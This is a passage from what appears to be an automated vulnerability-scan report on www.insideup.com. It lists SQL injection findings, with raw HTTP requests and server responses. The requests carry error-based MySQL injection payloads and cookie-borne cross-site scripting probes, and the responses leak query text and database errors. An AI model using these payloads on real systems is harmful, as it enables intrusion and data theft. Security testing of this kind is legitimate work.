OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2p3dh815837qt6f8ddmqmg6dp2; path=/
Content-Length: 2310
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
j.groupId    
    where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='/'
   union select ' at line 5

Request 2

GET /ppc/leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001179)%3C/script%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:55:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f18cdlvfd1dhvc50p01ck9avg0; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/leadflow/bulo00/project.php was not found on this server.</p>

1.10. http://www.insideup.com/ppc/leadflow/bulo00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow''/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.11. http://www.insideup.com/ppc/leadflow/bulo00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00'/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/bulo00''/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:46:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.12. http://www.insideup.com/ppc/leadflow/bulo00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php'?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9174


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php''?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:01:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project.php'' was not found on this server.</p>

1.13. http://www.insideup.com/ppc/leadflow/bulo00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

